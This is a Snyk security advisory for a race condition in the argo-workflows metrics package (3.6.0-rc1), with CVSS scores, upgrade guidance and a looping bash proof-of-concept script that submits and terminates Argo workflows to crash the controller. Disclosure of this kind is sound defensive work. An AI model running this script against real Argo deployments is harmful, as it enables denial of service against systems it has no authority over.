Race Condition Affecting github.com/argoproj/argo-workflows/v3/workflow/metrics package, versions >=3.6.0-rc1 <3.6.0-rc2


Severity

Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team

    Threat Intelligence

    Exploit Maturity
    Proof of concept
    EPSS
    0.04% (6th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-GOLANG-GITHUBCOMARGOPROJARGOWORKFLOWSV3WORKFLOWMETRICS-8309368
  • published 30 Oct 2024
  • disclosed 28 Oct 2024
  • credit Andrew Melnick

How to fix?

Upgrade github.com/argoproj/argo-workflows/v3/workflow/metrics to version 3.6.0-rc2 or higher.

Overview

Affected versions of this package are vulnerable to Race Condition via the global variable metrics_k8s_request when a second request is made before the first completes. An attacker can cause the system to crash by executing a workflow.

PoC

#!/bin/bash -xeu

while true ; do
    name=$(
        { argo submit /dev/stdin <<'EOF'
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
  generateName: curl-
spec:
  entrypoint: main
  templates:
  - name: main
    dag:
      tasks:
        - name: no-op
          template: no-op
          withSequence:
            count: 3
  - name: no-op
    daemon: true
    container:
      image: alpine:3.13
      command: [sleep, infinity]
EOF
    } | head -n1 | awk '{ print $2 }'
    )
    ( sleep 30; argo terminate $name ) &
    sleep 15
done

CVSS Scores

version 4.0
version 3.1
Expand this section

Snyk

Recommended
6.9 medium
  • Attack Vector (AV)
    Adjacent
  • Attack Complexity (AC)
    Low
  • Attack Requirements (AT)
    None
  • Privileges Required (PR)
    Low
  • User Interaction (UI)
    None
  • Confidentiality (VC)
    None
  • Integrity (VI)
    None
  • Availability (VA)
    High
  • Confidentiality (SC)
    None
  • Integrity (SI)
    None
  • Availability (SA)
    None